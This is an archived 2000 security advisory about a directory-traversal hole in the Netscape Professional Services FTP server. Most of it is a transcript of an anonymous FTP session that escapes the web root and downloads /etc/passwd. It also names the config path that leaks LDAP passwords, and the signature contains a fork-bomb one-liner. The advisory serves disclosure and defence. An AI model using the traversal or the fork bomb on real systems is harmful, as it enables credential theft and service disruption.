Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:372
HistoryJun 22, 2000 - 12:00 a.m.

Netscape FTP Server - "Professional" as hell :>

2000-06-2200:00:00
vulners.com
18
JSON

Standard disclaimer applies. These are my private oppinions and
observations.

Netscape Professional Services FTP server is used on high-performance
servers for accessing virtual webserver accounts etc. It works with LDAP
and seems to be quite often shipped by Sun with ISP instalations.

Due to poor coding, whole virtual server structure, LDAP server and other
parts of system are exposed to trivial attacks. There are also several
overflows, but who cares, it's much easier:

Long Live the Programmers!

$ ftp ftp.XXXX.xxx
Connected to ftp.XXXX.xxx.
220-FTP Server - Version 1.36 - (c) 1999 Netscape Professional Services
220 You will be logged off after 1200 seconds of inactivity.
Name (ftp.XXXX.xxx:lcamtuf): anonymous
331 Anonymous user OK, send e-mail address as password.
Password:
230 Logged in OK
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd …/…/…/dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/n/o/n/anonymous/dupa" because No such
file or directory

[Well… this won't work… uh, lovely physical path, btw ;]

ftp> cd /…/…/…/dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/n/dupa" because No such file or
directory
ftp> cd /…/…/…/…/dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/dupa" because
No such file or directory

[Erm? Good God!]

ftp> cd /…/…/…/…/…/…/…/…/etc/dupa
550 Can't change directory to "/etc/dupa" because No such file or
directory
ftp> cd /…/…/…/…/…/…/…/…/etc/
250 CWD command successful.
ftp> get /…/…/…/…/…/…/…/…/etc/passwd KUKU
local: KUKU remote: /…/…/…/…/…/…/…/…/etc/passwd
200 PORT successfull, connected to A.B.C.D port 62437
150-Type of object is "unknown/unknown". Transfer MODE is BINARY.
150 Opening data connection
226 File downloaded successfully (602 bytes, 602 bytes xmitted)
602 bytes received in 1.71 secs (0.34 Kbytes/sec)
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 1 kbytes.
221 CPU time spent on you: 0.100 seconds.

$ cat KUKU
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:

Consequences:

  • downloading / uploading any files to remote system,
    regardless of (poorly) implemented limits, with
    ftp daemon privledges (you can exploit eg. /tmp races,
    download vital files from system or other accounts etc)

  • this ftp server supports LDAP users; different LDAP
    accounts are served on single physical UID. It means,
    any user can access and eventually overwrite files
    on other accounts; as it's used in cooperation with
    webserver, usually virutal web servers are affected,

  • by accessing eg.
    /…/…/…/…/…/…/…/…/opt/netscape/ftpd/conf/ftpd.ini,
    you can simply grab LDAP passwords.

Fix:

? Switching to open-source will be good. To developers: man chroot.

Michal Zalewski [[email protected]] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=–=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=

JSON